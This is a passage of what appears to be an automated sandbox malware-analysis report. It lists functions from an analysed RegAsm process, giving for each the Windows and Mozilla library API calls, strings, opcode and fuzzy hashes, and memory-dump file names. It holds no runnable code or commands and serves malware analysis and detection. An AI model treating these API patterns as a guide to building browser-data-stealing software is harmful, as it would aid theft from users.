                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4321B271A042198FCB10CF69D9886AE77F5EF84308F044439E80997340EB709A58CFA2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C8576C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32 ref: 6C8576F2
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000001), ref: 6C857705
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C80CA10: malloc.MOZGLUE(?), ref: 6C80CA26
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C857717
                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C85778F,00000000,00000000,00000000,00000000), ref: 6C857731
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C857760
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2538299546-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: cbc143706aa0c344bc578d5ab31869c5e4789f67b3d6490cfef1c1831890727c
                                                                                                                                                                                                                                                                                                  • Instruction ID: ce9d862a91342eb4b9b1639473e3c9e32c67f2212f02dda886d08962f86a6272
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cbc143706aa0c344bc578d5ab31869c5e4789f67b3d6490cfef1c1831890727c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1211B6B59043156FD720AFBA9D44B6B7EE8EF46354F048839F848A7300E7709850C7E2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C830D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C7F3DEF), ref: 6C830D71
                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C7F3DEF), ref: 6C830D84
                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C7F3DEF), ref: 6C830DAF
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Virtual$Free$Alloc
                                                                                                                                                                                                                                                                                                  • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                                                                  • API String ID: 1852963964-2186867486
                                                                                                                                                                                                                                                                                                  • Opcode ID: b8735ede4f8acd2729d98a0d784bdfd5922a2d181e3b18385615ec28fe1e5258
                                                                                                                                                                                                                                                                                                  • Instruction ID: df204fdf33cdba02465e44940eff49fa8fe2387866d13049a80aaccc2f54b07b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8735ede4f8acd2729d98a0d784bdfd5922a2d181e3b18385615ec28fe1e5258
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4F0E03138027823D53111E55E09B6E659E67C1F15F707935F20CDADC0FB50E40486F5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C847620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C8475C4,?), ref: 6C84762B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C80CA10: malloc.MOZGLUE(?), ref: 6C80CA26
                                                                                                                                                                                                                                                                                                  • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C8474D7,6C8515FC,?,?,?), ref: 6C847644
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C84765A
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C8474D7,6C8515FC,?,?,?), ref: 6C847663
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C8474D7,6C8515FC,?,?,?), ref: 6C847677
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 418114769-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: f802f7d54524f8f9cef831eef47b94728714b94fc2d8fc46ec64c7d829a7c11e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7076f92d013417a23305c5112084f05132a6ffa0fe67c5bcf722991c30e4fdeb
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f802f7d54524f8f9cef831eef47b94728714b94fc2d8fc46ec64c7d829a7c11e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77F0AF72E10755ABE7018F21C88867AB779FFEA259F114326F90452602E7B0A5D0CBE1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0041B461 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0041B46D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041B644: __getptd_noexit.LIBCMT ref: 0041B647
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041B644: __amsg_exit.LIBCMT ref: 0041B654
                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0041B484
                                                                                                                                                                                                                                                                                                  • __amsg_exit.LIBCMT ref: 0041B492
                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0041B4A2
                                                                                                                                                                                                                                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0041B4B6
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 938513278-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0f6afaa9064bb234d9d04682b667ea74c0d2944bc8bfe346e0a6a773a651760d
                                                                                                                                                                                                                                                                                                  • Instruction ID: b0c707a50401f718638692aa78b59e6a41ed05d44f506c8c98db66485addeac5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f6afaa9064bb234d9d04682b667ea74c0d2944bc8bfe346e0a6a773a651760d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92F06231A417109AD721BB769807BCD3290EF04729F61811FF419572C3CB6C59C18ADF
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C81D468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82CBE8: GetCurrentProcess.KERNEL32(?,6C7F31A7), ref: 6C82CBF1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7F31A7), ref: 6C82CBFA
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C87E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C82D1C5), ref: 6C81D4F2
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C87E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C82D1C5), ref: 6C81D50B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FCFE0: EnterCriticalSection.KERNEL32(6C87E784), ref: 6C7FCFF6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FCFE0: LeaveCriticalSection.KERNEL32(6C87E784), ref: 6C7FD026
                                                                                                                                                                                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C82D1C5), ref: 6C81D52E
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C87E7DC), ref: 6C81D690
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C87E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C82D1C5), ref: 6C81D751
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                                                                                                                                                                                                                                  • String ID: MOZ_CRASH()
                                                                                                                                                                                                                                                                                                  • API String ID: 3805649505-2608361144
                                                                                                                                                                                                                                                                                                  • Opcode ID: e1206dc03a5a6169008dc6e7fb783f1fff7d57fcdb5b4d6e69ddaca2a5139944
                                                                                                                                                                                                                                                                                                  • Instruction ID: 47e816ca9e803762a5f3e404620943a745771fc68650ae1873cb260d32701b67
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1206dc03a5a6169008dc6e7fb783f1fff7d57fcdb5b4d6e69ddaca2a5139944
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F751B171A087128FD735CF28C29476AB7E1EB89308F544E2ED559C7F45E774A840CBA1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C844630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __aulldiv
                                                                                                                                                                                                                                                                                                  • String ID: -%llu$.$profiler-paused
                                                                                                                                                                                                                                                                                                  • API String ID: 3732870572-2661126502
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9a0582fcb00f2b8c3fdd36a84b89cd3d3599bd63c3528f57dcdf29f2455687ae
                                                                                                                                                                                                                                                                                                  • Instruction ID: 14990ecd06d284bee3861f1b2f99af26a203b6d03ed431371909539543806595
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a0582fcb00f2b8c3fdd36a84b89cd3d3599bd63c3528f57dcdf29f2455687ae
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 36415771A0460C9BCB18CF79DA4516EBBE5EFC5348F20CA3EE855A7B41EB309844C791
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C8446E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 6C844721
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F4410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C833EBD,00000017,?,00000000,?,6C833EBD,?,?,6C7F42D2), ref: 6C7F4444
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __aulldiv__stdio_common_vsprintf
                                                                                                                                                                                                                                                                                                  • String ID: -%llu$.$profiler-paused
                                                                                                                                                                                                                                                                                                  • API String ID: 680628322-2661126502
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0290ddda0e34f91503980a24c64cd1c80b2a99d232de9fb4f032ebb681ebf30e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 94cbecf60dd385c400b033d2e60654103dbde47b05282239251f2e68d3d8a5f2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0290ddda0e34f91503980a24c64cd1c80b2a99d232de9fb4f032ebb681ebf30e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0A317771F0420C9BCB18CF6CD9852AEBBE6DBC9314F54893EE8059BB41EB74D8048B90
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C84B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C833EBD,6C833EBD,00000000), ref: 6C7F42A9
                                                                                                                                                                                                                                                                                                  • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C84B127), ref: 6C84B463
                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C84B4C9
                                                                                                                                                                                                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C84B4E4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _getpidstrlenstrncmptolower
                                                                                                                                                                                                                                                                                                  • String ID: pid:
                                                                                                                                                                                                                                                                                                  • API String ID: 1720406129-3403741246
                                                                                                                                                                                                                                                                                                  • Opcode ID: abe79b4013cf78f987065a7d1a201615ab9ed9db63790d2d86b2ed279e8044c8
                                                                                                                                                                                                                                                                                                  • Instruction ID: c5ed005e413d1abd899575f70d970794e46f89d80575514758e21ce33caf974b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: abe79b4013cf78f987065a7d1a201615ab9ed9db63790d2d86b2ed279e8044c8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32311031A01A1C8FCB20DFA9DA84AFEB7B5BF45318F544D29D81167A41E731E849CBE1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C83E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83E577
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83E584
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83E5DE
                                                                                                                                                                                                                                                                                                  • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C83E8A6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                                                                                                                                                                                                                                                  • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                                                                                                                                                                                                                                  • API String ID: 1483687287-53385798
                                                                                                                                                                                                                                                                                                  • Opcode ID: 196e9c28af1f74460c699d68741cf0a0cce657243d2dcca092baa0f751480404
                                                                                                                                                                                                                                                                                                  • Instruction ID: f41c7da5e594ebbf835f58b4f8eb8a395b9d270bece79738972b05a2c8e395a7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 196e9c28af1f74460c699d68741cf0a0cce657243d2dcca092baa0f751480404
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5011CE32A04268DFCB319F19C54CA6EBBB4FB8932CF400A29E84547B50E770A804CBF1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 004118D0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 004118FF
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041190A
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00411919
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseHandle$FileSize
                                                                                                                                                                                                                                                                                                  • String ID: @gA
                                                                                                                                                                                                                                                                                                  • API String ID: 2872161284-2763839668
                                                                                                                                                                                                                                                                                                  • Opcode ID: be0861bd07478ad02713f18f795e35d96040d96b66875ad2d50d8ded7a170f8d
                                                                                                                                                                                                                                                                                                  • Instruction ID: baf132ae4d0610b981fda35545c6c569f4d03e1b4a05ac6343dd9b92e07ff3f1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be0861bd07478ad02713f18f795e35d96040d96b66875ad2d50d8ded7a170f8d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CBF0E931E50214BBE720DB68EC09FDA776DDB09721F0002A5FD15E32D0E7706A4086D4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0040F4D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • std::exception::exception.LIBCMT ref: 0040F4FF
